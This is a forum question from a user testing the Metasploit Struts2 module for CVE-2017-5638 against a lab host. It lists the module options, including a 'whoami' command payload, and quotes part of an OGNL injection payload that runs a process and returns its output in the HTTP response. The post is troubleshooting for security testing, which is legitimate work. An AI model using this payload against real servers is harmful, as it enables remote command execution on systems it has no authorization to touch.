AnsweredAssumed Answered

Apache Struts2 OGNL injection(CVE-2017-5638) module can't exploit.

Question asked by iwama yu on Apr 5, 2017

Hi, I am testing Apache Struts Jakarta Multipart Parser OGNL Injection(CVE-2017-5638,S02-045,S02-046) by using Metasploit module, but can not exploit.

 

# Setting options for module
=============================================================================
msf exploit(struts2_content_type_ognl) > show options
Module options (exploit/multi/http/struts2_content_type_ognl):


   Name           Current Setting                 Required  Description
   ----           ---------------                 --------  -----------
   DynamicStager  true                            no        Use Dynamic C-Stager if applicable (AV evasion)
   Proxies                                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST          10.3.204.70                     yes       The target address
   RPORT          8080                            yes       The target port (TCP)
   SSL            false                           no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /struts2-showcase/index.action  yes       The path to a struts application action
   VHOST                                          no        HTTP server virtual host


Payload options (cmd/unix/generic):


   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   CMD   whoami           yes       The command string to execute
=============================================================================

 

So, I tested same target site by using the following PoC Code(https://www.exploit-db.com/exploits/41570/) and confirmed can to exploit.

 

PoC Code can to exploit but metasploit module can not to exploit to same target site, why?

I investigate the cause of can not to exploit and I found to two point.

 

Firstly I compared the metasploit module source code with the PoC code,I was not found the following line to the metasploit module.

(#p.redirectErrorStream(true)).(#process=#p.start()).
(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).
(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).
(#ros.flush())}

 

Secondary The HTTP Request that metasploit module send exists two Content-type header.

WS000019.JPG

What I did wrong?

Outcomes